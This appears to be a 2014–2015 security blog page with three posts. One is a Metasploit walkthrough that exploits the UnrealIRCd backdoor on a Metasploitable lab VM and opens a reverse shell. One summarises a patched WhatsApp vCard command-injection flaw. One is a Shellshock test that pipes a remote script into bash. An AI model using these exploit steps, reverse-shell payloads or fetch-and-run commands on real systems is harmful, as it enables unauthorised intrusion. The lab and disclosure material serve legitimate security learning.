Social Icons

Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts

Saturday, October 24, 2015

IRC Exploit tutorial to hack into ROOT shell : Metasploitable 2 - Kali LInux 2

1.  root is the user name that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.For the hackers and cyber criminals,getting to root shell is the key to start doing the undesired.There are thousands of ways and options to get to this vide various exploits,tricks and hacks.In this post I give a step by step with screenshot guide to get to "root" of a Metasploitable machine from a Kali Linux machine.The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.This would come handy for beginners in this domain.I have two virtual machines for this test including one Metasploitable and one Kali Linux.

Setting up the Virtual Machines

Firstly,we need to configure the host only adapter settings as shown below in the Virtual box.

Click on Network - Host only networks tab and then "Add host only adapter" as shown below :
Edit the settings of the Host only adapter
Configure the IP address to any range as you desire.I have set up as seen below :
Now I have configured my VM Kali as per the following settings shown :
The Metasploitable machine configured as seen below :
Checking PING between the two machines


Playing with the setup : Running tools and exploits

The first thing to do is to run an nmap scan and see what services are running.At the terminal window on your Kali system,type the following :

nmap -sS -Pn

In our the Metasploitable Machine IP is 192.168.56.103.The “-sS” switch in the above command asks nmap to perform a stealth scan. The “-Pn” tells nmap not to run a ping scan to see what systems are up
Running nmap command with the “-A” switch, will perform OS detection and try to determine service versions.Running the command wil give us a screen output something like as shown below : 

nmap -sS -Pn -A 192.168.56.103
There are also a lot of services running as seen above but the one in particular we are interested is an Unreal Internet Relay Chat (IRC) program as highlighted below.In the screenshot below we see the software version, in this case “Unreal IRC 3.2.8.1′′. Our next step is to use Metasploit to exploit the vulnerability.
Get to the Kali terminal and type msfconsole to get this screen as seen below : 
The basic sequence of exploiting a vulnerability goes as shown below :

- Picking an Exploit
- Setting Exploit Options
- Picking a Payload
- Setting Payload Options
- Running the Exploit
- Connecting to the Remote System

Going further now at the msf terminal type : use exploit/unix/irc/unreal_ircd_3281_backdoor
Next we need to set the RHOST as per the following terminal command:

RHOST 192.168.198.145(Metasploitable IP address )
At the msf terminal,type “show payloads” to display all payloads that work with the exploit:
Now we will use the generic reverse shell. This will give us the terminal shell with the target when the exploit is finished.Type the following at the msf terminal:

set payload cmd/unix/reverse
Show options command further will give the current settings as configured :
So we see above LHOST remains to be configured and we configure it now as follows :

Running the show options command again shows the configured setup as desired : 
and now the final bullet...simply type : exploit at the msf terminal
and here you are...right at the terminal@root
Just make a directory for testing it at the victim Metasploitable machine.I have made by the name of anupam and we see the same at the second terminal window seen in the screenshot below :
...that's it guys...any questions...most welcome...

Saturday, September 12, 2015

vCard Vulnerability : WhatsApp

1.     WhatsApp,the exceedingly renowned application that has actually swung around the way we all chat, talk, share and do so many things has so many PROs but over this small period of time since its inception it has also been the quarry of cyber criminals. With a user base as strong as 900 million active users in Apr 2015,any vulnerability in the architecture cosmos is destined to be a remunerative lure for any cyber criminal. A recent vulnerability in the form of simply sharing a vCard with other user discovered by Check Point security researcher Kasif Dekel has come to the fore. It involves simply sharing the seemingly guileless vCard with the victim and as the victim clicks the vCard, his task his over since rest will be done in the background by the malicious code terra incognita to the user. This vCard actually exists as an executable file and gets into action the moment it gets clicked by the user in the application. 
 
 

RESOLVED by update from WhatsApp 

2.   WhatsApp affirmed and recognized the security egress and have released the fix in all versions greater than 0.1.4481 and blockaded that especial lineament. 

How it Happens? 

3.   To activate the code, Kasif Dekel ascertained an attacker could just inject the command to the name attribute of the vCard file, separated by the ‘&’ character. When executed, it will attempt to run all lines in the files, including controlled injection line. Once such a contact is made, all an attacker has to do is share it via the normal WhatsApp client. 

What made the application Vulnerable? 

4.    WhatsApp Web allows users to view any type of media or attachment that can be sent or viewed by the mobile platform/application. This includes images, videos, audio files, locations and contact cards.Thus the default action runs for the vCard for running the code whilst being understood as sharing the contact details. 
 
What can it do ?
 
Once the code is activated,it is bound to take complete control over the target machine and will definitely monitor the user’s activities and use the target machine to spread malicious malwares and viruses ahead.

Timelines by CHECKPOINT on the vulnerability 
 
    August 21, 2015 – Vulnerability disclosed to the WhatsApp security team.
    August 23, 2015 – First response received.
    August 27, 2015 – WhatsApp rolls out fixed web clients (v0.1.4481)
    September 8, 2015 – Public disclosure 

Thanks CHECKPOINT

Thursday, November 06, 2014

Testing UBUNTU for SHELLSHOCK vulnerability

Shellshock,the now famous vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST , you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3.Its always good to at least close known bugs and holes since zero vulnerabilities always exist....here i bring out few ready made cut/paste terminal commands to test your UBUNTU...This simply involves running of a script shellshock_test.sh.Source code at https://github.com/wreiske/shellshocker/blob/master/shellshock_test.sh

Screen shot shown below as run from my system :  

Terminal cmd : curl https://shellshocker.net/shellshock_test.sh | bash

(Click to ENLARGE)

Powered By Blogger